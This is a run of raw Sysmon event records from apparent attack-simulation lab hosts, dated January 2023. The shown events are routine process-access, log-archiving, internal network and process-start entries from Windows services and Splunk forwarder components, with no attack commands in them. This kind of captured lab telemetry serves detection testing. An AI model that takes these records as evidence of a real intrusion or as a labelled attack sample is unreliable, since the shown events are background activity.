12:26:25.671{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017668Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:25.671{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017667Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:25.671{E5A8D418-DC43-63C7-0B00-00000000B002}632680C:\Windows\system32\lsass.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017666Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:25.659{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000017665Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:25.243{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D69C991F7BFCEC364DF08AE7920A2B5E,SHA256=CFCDFCAD412EFD5B29909987225299B959ED778DAFF25615AEF6E14C63D0388C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045246Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:26.587{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B14E632443288E7E80E43FDD1154CF5F,SHA256=D0BC2AEF33327B8FEA1DA7DFFBD97DD2CCF25A1C482444AE08F2814E6050D782,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045245Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:26.091{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDF5D014805C2E64FB27F9604D4DAB3A,SHA256=4207DDA9748A72ADBBCE24881215F392A9877694DFE7495AE9531DA14CC3AEEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017670Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:26.323{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD3C30405DA27BE1DA1E736FECAAB01E,SHA256=3BA069C576D07C73CC63CD6A17DC13BD80433CB8F989600E5E7B3DF23CFE1311,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017671Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:27.399{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=167DCE01DF3BB87185C6BC72A8BD9391,SHA256=E1FF402CD0BC4B04A05CC31868AA63DAD523E78942A2C526F4FAE9BC6A238516,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045249Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:27.698{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000045248Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:25.578{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56418-false10.0.1.12-8000- 23542300x800000000000000045247Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:27.184{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FD1C1A14618555CFD7F527D089A7F87,SHA256=A6E1441AE0603CA46C2F6FA4B3A24A6021B76BC1C807AB582D2F2FDC2016EE18,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017673Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:27.036{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50148-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017672Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:28.486{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA95DB0A26A9873E9CB4E3C761EEB348,SHA256=EA11C02243B6AFE6CC5EF04BF1A07D8EB282ADBDF669600951341D50366B8B9C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045259Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:28.964{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E574-63C7-6A06-00000000AF02}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045258Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:28.964{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E574-63C7-6A06-00000000AF02}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045257Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:28.964{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045256Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:28.964{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045255Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:28.964{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E574-63C7-6A06-00000000AF02}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045254Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:28.964{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045253Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:28.964{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045252Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:28.964{FE4C2B44-E574-63C7-6A06-00000000AF02}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000045251Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:28.381{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=580872933AB1A10C7E8286A8DF47D417,SHA256=54930A9F2938F6853A7FF87F0369B5F45FEB74D83F6EB00C28EB4A06B600B4E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045250Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:28.273{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6E786F736EB9190442EB4EE5CB34429,SHA256=5320268822637113B86B19EC2AD89FD1B2E3729B0C211DCBEB4C1A07EDF12325,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017705Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.989{E5A8D418-E575-63C7-2002-00000000B002}3944524C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017704Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.832{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E575-63C7-2002-00000000B002}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017703Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.832{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017702Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.832{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017701Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.832{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017700Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.832{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017699Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.832{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017698Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.832{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017697Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 